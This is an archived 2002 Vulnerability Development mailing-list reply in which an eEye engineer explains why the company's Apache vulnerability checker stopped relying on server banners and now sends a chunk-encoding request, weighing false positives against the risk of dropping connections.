Vulnerability Development mailing list archives

Re: Apache vulnerability checking

From: "Laurentiu Nicula" <lnicula () eeye com>
Date: Wed, 26 Jun 2002 15:16:37 -0700

Bram Matthys said

I didn't know eEye's tool only checked the version, pretty strange since
it's easy to make something like I did. Ofcourse in case someone is using
apache 2.x + multiple connections per child or something = some other
clients will be killed too... maybe they didn't want to take that risk.


Initially the tool checked only the Version and at some point it even had an
internal list of vendor - versions pairs that were tagged as "Might not be
vulnerable"

We had to chose between a big number of false positives due to various bug
backports and fake banners and the risk of like you said, killing some
connections.

So, to make the tool useful, current version disregards the Server banner
completely and does a chunk encoding request to the server.

Signed,
Laurentiu Nicula
Software Engineer
eEye Digital Security
T.949.349.9062
F.949.349.9538

http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris/ - Network Traffic Analyzer
http://eEye.com/SecureIIS - Web Application Firewall

Current thread:

Apache vulnerability checking Syzop (Jun 23)
- RE: Apache vulnerability checking Elan Hasson (Jun 24)
- <Possible follow-ups>
- Re: Apache vulnerability checking Toni Heinonen (Jun 24)
  - Re: Apache vulnerability checking Syzop (Jun 26)
    - Re: Apache vulnerability checking Laurentiu Nicula (Jun 26)
  - Message not available
    - Re: Apache vulnerability checking Alex Balayan (Jun 26)